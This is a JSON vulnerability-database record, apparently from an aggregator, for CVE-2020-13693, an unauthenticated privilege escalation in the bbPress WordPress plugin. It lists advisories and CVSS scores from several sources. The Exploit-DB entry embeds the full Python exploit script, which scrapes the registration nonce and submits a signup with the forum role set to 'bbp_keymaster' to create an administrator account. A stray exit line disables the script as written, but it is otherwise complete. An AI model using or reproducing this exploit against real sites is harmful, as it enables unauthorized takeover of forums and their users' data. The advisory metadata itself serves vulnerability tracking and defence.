"https://patchstack.com/database/vulnerability/bbpress/wordpress-bbpress-plugin-2-6-4-unauthenticated-privilege-escalation-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-01-11T15:13:49", "description": "The WordPress bbPress Plugin installed on the remote host is affected by a privilege escalation vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-26T00:00:00", "type": "nessus", "title": "bbPress Plugin for WordPress < 2.6.5 Privilege Escalation", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13693"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:bbpress:bbpress:*:*:*:*:*:wordpress:*:*"], "id": "WEB_APPLICATION_SCANNING_112480", "href": "https://www.tenable.com/plugins/was/112480", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wpvulndb": [{"lastseen": "2021-02-15T22:17:19", "description": "Raphael Karger discovered an unauthenticated privilege escalation issue when new user registration is enabled.\n", "cvss3": {}, "published": "2020-05-28T00:00:00", "type": "wpvulndb", "title": "bbPress < 2.6.5 - Unauthenticated Privilege Escalation when New User Registration enabled", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2020-13693"], "modified": "2020-06-02T05:00:08", "id": "WPVDB-ID:1A075D62-B5D2-4B58-A74F-73A0166AEE12", "href": "https://wpscan.com/vulnerability/1a075d62-b5d2-4b58-a74f-73a0166aee12", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-08-16T04:10:11", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-01T00:00:00", "type": "exploitdb", "title": "WordPress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-13693", "CVE-2020-13693"], "modified": "2020-06-01T00:00:00", "id": "EDB-ID:48534", "href": "https://www.exploit-db.com/exploits/48534", "sourceData": "# Exploit Title: Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation\r\n# Date: 2020-05-29\r\n# Exploit Author: Raphael Karger\r\n# Software Link: https://codex.bbpress.org/releases/\r\n# Version: BBPress < 2.5\r\n# CVE: CVE-2020-13693\r\n\r\nimport argparse\r\nimport requests\r\nimport bs4\r\nimport urllib3\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\n \r\nuseragent = {\"User-Agent\" : \"This is a real browser i swear\"}\r\n\r\ndef grab_nonce_login_page(url):\r\n try:\r\n login_page_request = requests.get(url, verify=False, timeout=10, headers=useragent)\r\n soup = bs4.BeautifulSoup(login_page_request.text, \"lxml\")\r\n action = soup.find(\"form\", class_=\"bbp-login-form\")\r\n wp_login_page = action.get(\"action\")\r\n wp_nonce = action.find(\"input\", id=\"_wpnonce\").get(\"value\")\r\n return (wp_nonce, wp_login_page)\r\n except Exception as nonce_error:\r\n print(\"[-] Nonce Error: '{}'\".format(nonce_error))\r\n return False\r\n\r\ndef exploit(url, username, password, email):\r\n info = grab_nonce_login_page(url)\r\n if info:\r\n nonce = info[0]\r\n login_page = info[1]\r\n try:\r\n return requests.post(login_page, data={\r\n \"user_login\" : username,\r\n \"user_pass\" : password,\r\n \"user_email\" : email,\r\n \"user-submit\" : \"\",\r\n \"user-cookie\" : \"1\",\r\n \"_wpnonce\" : nonce,\r\n \"bbp-forums-role\" : \"bbp_keymaster\"\r\n }, allow_redirects=False, verify=False, timeout=10, headers=useragent)\r\n except Exception as e:\r\n print(\"[-] Error Making Signup Post Request: '{}'\".format(e))\r\n return False\r\n\r\nif __name__ == \"__main__\":\r\n exit(\"asdasd\")\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"-n\", \"--username\", dest=\"username\", help=\"Username of Newly Created Keymaster\", default=\"raphaelrocks\")\r\n parser.add_argument(\"-p\", \"--password\", dest=\"password\", help=\"Password of Newly Created Keymaster\", default=\"raphael123\")\r\n parser.add_argument(\"-e\", \"--email\", dest=\"email\", help=\"Email of Newly Created Keymaster\", default=\"test@example.com\")\r\n parser.add_argument(\"-u\", \"--url\", dest=\"url\", help=\"URL of Page With Exposed Register Page.\", required=True)\r\n args = parser.parse_args()\r\n site_exploit = exploit(args.url, args.username, args.password, args.email)\r\n if site_exploit and site_exploit.status_code == 302:\r\n exit(\"[+] Exploit Successful, Use Username: '{}' and Password: '{}'\".format(args.username, args.password))\r\n print(\"[-] Exploit Failed\")", "sourceHref": "https://www.exploit-db.com/download/48534", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}

WordPress BBPress 2.5 Privilege Escalation

Description

Related